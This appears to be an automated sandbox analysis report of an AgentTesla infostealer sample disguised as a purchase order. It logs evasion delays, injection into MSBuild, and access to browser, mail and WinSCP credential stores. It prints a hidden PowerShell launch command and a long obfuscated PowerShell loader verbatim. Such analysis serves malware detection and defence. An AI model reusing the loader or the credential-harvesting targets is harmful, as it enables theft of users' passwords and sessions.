                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98218Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98107Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99546Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99218Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98999Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98780Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98452Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98112Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599764Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599430Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599091Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598983Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598547Jump to behavior
                Source: MSBuild.exe, 00000005.00000002.2591135790.000000000433C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_?
                Source: MSBuild.exe, 00000005.00000002.2591135790.00000000042EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8X4
                Source: MSBuild.exe, 00000005.00000002.2624055244.00000000212E4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2624055244.0000000021304000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000203A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HgFsZzyc1KET+4v5U4KAMADFEcDFNtvv+ITzKbSSW1vwK8EkWnQLLbTwXbLLF50cTbCI
                Source: MSBuild.exe, 00000005.00000002.2591135790.000000000433C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\PO_00290292.exeAPI call chain: ExitProcess graph end nodegraph_0-3795
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00F5D6E4 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,4_2_00F5D6E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118A796 mov eax, dword ptr fs:[00000030h]5_2_0118A796
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Maps a DLL or memory area into another process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\mshtml.dll target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read writeJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: B00000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: AFF840Jump to behavior
                Source: C:\Users\user\Desktop\PO_00290292.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $derremc = Get-Content 'C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\Lection.Fle' ; powershell.exe "$derremc"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Spejlvende Journaliseringssystems Conservatorial #><#Basilikers Toothcomb Letfordrvelig #>$Portugals = """Ko;SmFOmu RnFac FtTwiStoFonDe OtPAlyInxHui PdSkeInsEr4 F In{ S tv Po fi TupOvaBerGaafomPa(sm[BeS Tt HrPeiAunOsgEv]Ov`$SpSuioBelAnfPsa UlCedTo)Fo;bu Go`$OvNSkoOprDetNohObuRhm Cb OeLirAal BaTonbodDe Fu=Sk Ru`$ VSSpoAnlVafHeaPulHldRe.CiLHaePrnAsgFatInh M;Ne L Vi Af Ta`$PoD RrAniElf OtSvsPasUnyexs OtSteRimBumreeRetAnsSm Tr=Ch NoNArevvwAp-LaO NbSojOpe DcStt P Tb Ry FtSneVa[Pr]Wh Ud(Le`$miNBioLir VtPahMuuUdm TbSaeperGalAfaInnDedLi Op/ci St2Bo)An; K Ps`$PrRfioCadUntUme PgAnnGyeovtAn1St6Ug8Ab=Pi' CS AU D'In+ P'EdBUnSSpTBoRUnIThNDoG l'Aa;Af Da Co Im TF FoWarDe( D`$StNEnoChnCyetexNupudeOvccrt FaTanPatPa= U0Pl;No Ho`$NoNByoHjnUtelix Tp OeSoc St FaUnnSvtSy Op-ShlTetRe J`$KoNakoVurActQuh SuBumUdbYeeovrOrlSuaMinCrdcr;Li U`$SeNMaoPinTrePaxAlpspeLocHetSmaUnnBetBa+ro= G2Tr) P{Se Un He He Un Au Ko Ta ar`$PoDDer BiDefTet BsTrsBoyThs BtNaeunmKnmWaeAmtDosCa[ S`$ScNUgoBlnMaeApxEkpCaeRec At HaInnentDr/Ho2 U] K Ka= S Da[stcSmoPan BvSkeLer OtOb] N:Zi:UnTreoAaB SyBrt GeHa( d`$ JSMaoWilkofHoaOvlHodOm.No`$AtRPaoPodGitage NgTnnMaemat F1re6Ar8Be.CoI FnPhvSpoNektieJo(Fl`$PhN Do OnBoe RxCop ReSicTatInaSanBatJo,Ln Sp2Fu)Ep,Tr K1Cl6Un)Br;Po in F`$gaDPerChiMefKotRasOvsTey SsRetBoeFimSumIne wtUdsFi[Ar`$TrNMoo Sn Ue DxCypByeRocCotAnaNunomtTe/Ph2No]st Ar=So HaxGaoKnrSoaQummiiBa Sk`$MoDShrSei Sf UtsosPrsSpyLesdotBieDimDomRreUntSps P[ U`$UnNAroRen AeBexHopGee Sc PtBaaInnIntEa/Be2ov]Fi Po1Pl1 M0Gl;ra N un Po Fl}Fo Ou[PsSCotUnrPhiSynSogUn]De[PeSSuy PsLitSkepymIn.KaTSoe LxAntEu.SiEVan Dc UodedPriFnn PgSp]Ph: e:AyAPoSOoC MIFuIJa.PaGGee LtBeSCatStrEri wnUng B(da`$ElDCarIsiAtfPat BsChs SyMnsPttSeeUdmOvmaueDrtPas E)Ra;Un}St`$VeEBismetBjiGamSteHarDiiHanTogSmetorCh0 D=KoPGrySvxPuiOvdSme Ks l4Fi Sk'Au3StDHo1Af7Bo1TrDal1SyAsp0SiBri0 H3Cr4Af0Ma0PlABa0Af2 B0Gr2St'Ga;Ov`$deENesNetTiiFimBreKirSaiLenWagfjeBorLe1Py=AuP lyLexUniFedCleGesat4Op Fa'Ra2Pr3ta0 e7 D0KlDUn1NoCCo0Li1 R1 TDWe0Un1 D0Yv8Su1 TA O4 R0 A3ny9Sl0Fo7Cr0In0Ta5DaD K5ThCLo4 W0Kd3 KB F0Em0ig1SkD D0ReF R0ir8Bu0FoBOp2Ir0De0 SFUg1arAMa0St7Va1Be8 A0UnBKa2Ge3Ho0JuB A1 RA A0Vi6 G0 G1An0DeAHa1KaDPr'Wh; V`$ CEKos StSoi SmEneUnr ui TnNog SeOvrMe2As=ApPTaySaxDriUndreeTesSp4In ap'In2 d9Bl0CrBSa1 AAUn3MaESk1VaCun0Ch1Te0DdDin2SlFBu0SaAAl0TeA F1DyC D0TaBSt1 KDEl1TrDbr'Ra;Ca`$FaEHasSetPaiNim ReElrHai FnStgUre Irgr3 I=LaPGayWexfliBddSoeBosPa4No ek'Re3StDIn1mi7Un1RuDCp1 NA N0maBRo0Fa3 V4Ma0Br3UnC F1MiBZo0 H0So1FeAKa0Ma7Bl0Un3 C0CaB D4Mo0Pr2Da7Sc0Ho0Hu1ReA I0DiBFj1AgCFl0Ud1Su1SeEHo3PhDFo0CaBCo1 TCgr1re8Ma0 D7An0UdDBo0AtBJu1VeDPo4Jo0Mi2 P6 P0 SFFo0Ju0re0CoA S0Bl2 S0 LBUn3CaCNd0UnBLo0Af8 B' M;In`$DeECosDrtDri Sm se UrTriOunRegSke MrPr4Ti=deP IyPexSpiSpdCee FsSu4Zo Zo'At1PaDva1SoA E1ReCud0 B7Ha0 E0Mi0 A9Ti'No;Sw`$SeEHasBltSeiPamKoeOvrPoiGrnGegObe ArWi5Sk=DiPabyToxGaiSedOre GsVo4St D' F2Da9Ko0 MBtr1LiAAd2 U3Fe0Sl1sk0UnA P1asBTr0Do2Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#spejlvende journaliseringssystems conservatorial #><#basilikers toothcomb letfordrvelig #>$portugals = """ko;smfomu rnfac fttwistofonde otpalyinxhui pdskeinser4 f in{ s tv po fi tupovabergaafompa(sm[bes tt hrpeiaunosgev]ov`$spsuiobelanfpsa ulcedto)fo;bu go`$ovnskooprdetnohoburhm cb oeliraal batonbodde fu=sk ru`$ vsspoanlvafheapulhldre.cilhaeprnasgfatinh m;ne l vi af ta`$pod rranielf otsvspasunyexs otsterimbumreeretanssm tr=ch nonarevvwap-lao nbsojope dcstt p tb ry ftsneva[pr]wh ud(le`$minbiolir vtpahmuuudm tbsaepergalafainndedli op/ci st2bo)an; k ps`$prrfiocaduntume pganngyeovtan1st6ug8ab=pi' cs au d'in+ p'edbunssptborunithndog l'aa;af da co im tf fowarde( d`$stnenochncyetexnupudeovccrt fatanpatpa= u0pl;no ho`$nonbyohjnutelix tp oesoc st faunnsvtsy op-shltetre j`$konakovuractquh subumudbyeeovrorlsuamincrdcr;li u`$senmaopintrepaxalpspelochetsmaunnbetba+ro= g2tr) p{se un he he un au ko ta ar`$podder bideftet bstrsboyths btnaeunmknmwaeamtdosca[ s`$scnugoblnmaeapxekpcaerec at hainnentdr/ho2 u] k ka= s da[stcsmopan bvskeler otob] n:zi:untreoaab sybrt geha( d`$ jsmaowilkofhoaovlhodom.no`$atrpaopodgitage ngtnnmaemat f1re6ar8be.coi fnphvsponektiejo(fl`$phn do onboe rxcop resictatinasanbatjo,ln sp2fu)ep,tr k1cl6un)br;po in f`$gadperchimefkotrasovstey ssretboefimsumine wtudsfi[ar`$trnmoo sn ue dxcypbyeroccotananunomtte/ph2no]st ar=so haxgaoknrsoaqummiiba sk`$modshrsei sf utsosprsspylesdotbiedimdomrreuntsps p[ u`$unnaroren aebexhopgee sc ptbaainnintea/be2ov]fi po1pl1 m0gl;ra n un po fl}fo ou[psscotunrphisynsogun]de[pessuy pslitskepymin.katsoe lxanteu.sievan dc uodedprifnn pgsp]ph: e:ayaposooc mifuija.paggee ltbescatstreri wnung b(da`$eldcarisiatfpat bschs symnspttseeudmovmauedrtpas e)ra;un}st`$veebismetbjigamstehardiihantogsmetorch0 d=kopgrysvxpuiovdsme ks l4fi sk'au3stdho1af7bo1trdal1syasp0sibri0 h3cr4af0ma0plaba0af2 b0gr2st'ga;ov`$deenesnettiifimbrekirsailenwagfjeborle1py=aup lylexunifedclegesat4op fa'ra2pr3ta0 e7 d0kldun1nocco0li1 r1 tdwe0un1 d0yv8su1 ta o4 r0 a3ny9sl0fo7cr0in0ta5dad k5thclo4 w0kd3 kb f0em0ig1skd d0ref r0ir8bu0fobop2ir0de0 sfug1arama0st7va1be8 a0unbka2ge3ho0jub a1 ra a0vi6 g0 g1an0deaha1kadpr'wh; v`$ cekos stsoi smeneunr ui tnnog seovrme2as=apptaysaxdriundreetessp4in ap'in2 d9bl0crbsa1 aaun3maesk1vacun0ch1te0dddin2slfbu0saaal0tea f1dyc d0tabst1 kdel1trdbr'ra;ca`$faehassetpainim reelrhai fnstgure irgr3 i=lapgaywexflibddsoebospa4no ek're3stdin1mi7un1rudcp1 na n0mabro0fa3 v4ma0br3unc f1mibzo0 h0so1feaka0ma7bl0un3 c0cab d4mo0pr2da7sc0ho0hu1rea i0dibfj1agcfl0ud1su1seeho3phdfo0cabco1 tcgr1re8ma0 d7an0uddbo0atbju1vedpo4jo0mi2 p6 p0 sffo0ju0re0coa s0bl2 s0 lbun3cacnd0unblo0af8 b' m;in`$deecosdrtdri sm se urtriounregske mrpr4ti=dep iypexspispdcee fssu4zo zo'at1padva1soa e1recud0 b7ha0 e0mi0 a9ti'no;sw`$seehasbltseipamkoeovrpoigrngegobe arwi5sk=dipabytoxgaisedore gsvo4st d' f2da9ko0 mbtr1liaad2 u3fe0sl1sk0una p1asbtr0do2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#spejlvende journaliseringssystems conservatorial #><#basilikers toothcomb letfordrvelig #>$portugals = """ko;smfomu rnfac fttwistofonde otpalyinxhui pdskeinser4 f in{ s tv po fi tupovabergaafompa(sm[bes tt hrpeiaunosgev]ov`$spsuiobelanfpsa ulcedto)fo;bu go`$ovnskooprdetnohoburhm cb oeliraal batonbodde fu=sk ru`$ vsspoanlvafheapulhldre.cilhaeprnasgfatinh m;ne l vi af ta`$pod rranielf otsvspasunyexs otsterimbumreeretanssm tr=ch nonarevvwap-lao nbsojope dcstt p tb ry ftsneva[pr]wh ud(le`$minbiolir vtpahmuuudm tbsaepergalafainndedli op/ci st2bo)an; k ps`$prrfiocaduntume pganngyeovtan1st6ug8ab=pi' cs au d'in+ p'edbunssptborunithndog l'aa;af da co im tf fowarde( d`$stnenochncyetexnupudeovccrt fatanpatpa= u0pl;no ho`$nonbyohjnutelix tp oesoc st faunnsvtsy op-shltetre j`$konakovuractquh subumudbyeeovrorlsuamincrdcr;li u`$senmaopintrepaxalpspelochetsmaunnbetba+ro= g2tr) p{se un he he un au ko ta ar`$podder bideftet bstrsboyths btnaeunmknmwaeamtdosca[ s`$scnugoblnmaeapxekpcaerec at hainnentdr/ho2 u] k ka= s da[stcsmopan bvskeler otob] n:zi:untreoaab sybrt geha( d`$ jsmaowilkofhoaovlhodom.no`$atrpaopodgitage ngtnnmaemat f1re6ar8be.coi fnphvsponektiejo(fl`$phn do onboe rxcop resictatinasanbatjo,ln sp2fu)ep,tr k1cl6un)br;po in f`$gadperchimefkotrasovstey ssretboefimsumine wtudsfi[ar`$trnmoo sn ue dxcypbyeroccotananunomtte/ph2no]st ar=so haxgaoknrsoaqummiiba sk`$modshrsei sf utsosprsspylesdotbiedimdomrreuntsps p[ u`$unnaroren aebexhopgee sc ptbaainnintea/be2ov]fi po1pl1 m0gl;ra n un po fl}fo ou[psscotunrphisynsogun]de[pessuy pslitskepymin.katsoe lxanteu.sievan dc uodedprifnn pgsp]ph: e:ayaposooc mifuija.paggee ltbescatstreri wnung b(da`$eldcarisiatfpat bschs symnspttseeudmovmauedrtpas e)ra;un}st`$veebismetbjigamstehardiihantogsmetorch0 d=kopgrysvxpuiovdsme ks l4fi sk'au3stdho1af7bo1trdal1syasp0sibri0 h3cr4af0ma0plaba0af2 b0gr2st'ga;ov`$deenesnettiifimbrekirsailenwagfjeborle1py=aup lylexunifedclegesat4op fa'ra2pr3ta0 e7 d0kldun1nocco0li1 r1 tdwe0un1 d0yv8su1 ta o4 r0 a3ny9sl0fo7cr0in0ta5dad k5thclo4 w0kd3 kb f0em0ig1skd d0ref r0ir8bu0fobop2ir0de0 sfug1arama0st7va1be8 a0unbka2ge3ho0jub a1 ra a0vi6 g0 g1an0deaha1kadpr'wh; v`$ cekos stsoi smeneunr ui tnnog seovrme2as=apptaysaxdriundreetessp4in ap'in2 d9bl0crbsa1 aaun3maesk1vacun0ch1te0dddin2slfbu0saaal0tea f1dyc d0tabst1 kdel1trdbr'ra;ca`$faehassetpainim reelrhai fnstgure irgr3 i=lapgaywexflibddsoebospa4no ek're3stdin1mi7un1rudcp1 na n0mabro0fa3 v4ma0br3unc f1mibzo0 h0so1feaka0ma7bl0un3 c0cab d4mo0pr2da7sc0ho0hu1rea i0dibfj1agcfl0ud1su1seeho3phdfo0cabco1 tcgr1re8ma0 d7an0uddbo0atbju1vedpo4jo0mi2 p6 p0 sffo0ju0re0coa s0bl2 s0 lbun3cacnd0unblo0af8 b' m;in`$deecosdrtdri sm se urtriounregske mrpr4ti=dep iypexspispdcee fssu4zo zo'at1padva1soa e1recud0 b7ha0 e0mi0 a9ti'no;sw`$seehasbltseipamkoeovrpoigrngegobe arwi5sk=dipabytoxgaisedore gsvo4st d' f2da9ko0 mbtr1liaad2 u3fe0sl1sk0una p1asbtr0do2Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_004061A0 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_004061A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected AgentTesla
                Source: Yara matchFile source: 00000005.00000002.2609495360.0000000020171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7348, type: MEMORYSTR
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
